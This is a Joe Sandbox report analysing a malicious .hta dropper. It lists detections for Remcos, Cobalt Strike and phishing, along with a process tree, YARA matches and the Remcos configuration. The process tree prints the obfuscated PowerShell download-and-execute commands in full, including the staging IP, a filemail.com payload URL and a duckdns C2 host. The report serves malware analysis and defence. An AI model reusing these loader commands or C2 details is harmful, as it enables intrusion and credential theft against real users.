Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta

Overview

General Information

Sample name:seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
Analysis ID:1557815
MD5:2d71e3e87e2ea2945dcc2571b74fdb43
SHA1:a338df9a850b1c37528e1b517786285c216cf5e0
SHA256:0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4
Tags:htauser-pr0xylife
Infos:

Detection

Cobalt Strike, Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7528 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7628 cmdline: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 8028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 8092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • CasPol.exe (PID: 3276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • chrome.exe (PID: 7332 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • CasPol.exe (PID: 5576 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3832 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 4136 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 4520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 6784 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 5168 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 7360 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • msedge.exe (PID: 1660 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 7772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1972,i,17397243976134850236,17257031585275351317,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • svchost.exe (PID: 7604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7696 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2324 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6784 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3220 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6888 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                12.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                12.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 7 entries

                Other

                SourceRuleDescriptionAuthorStrings
                amsi32_752.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi32_752.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWl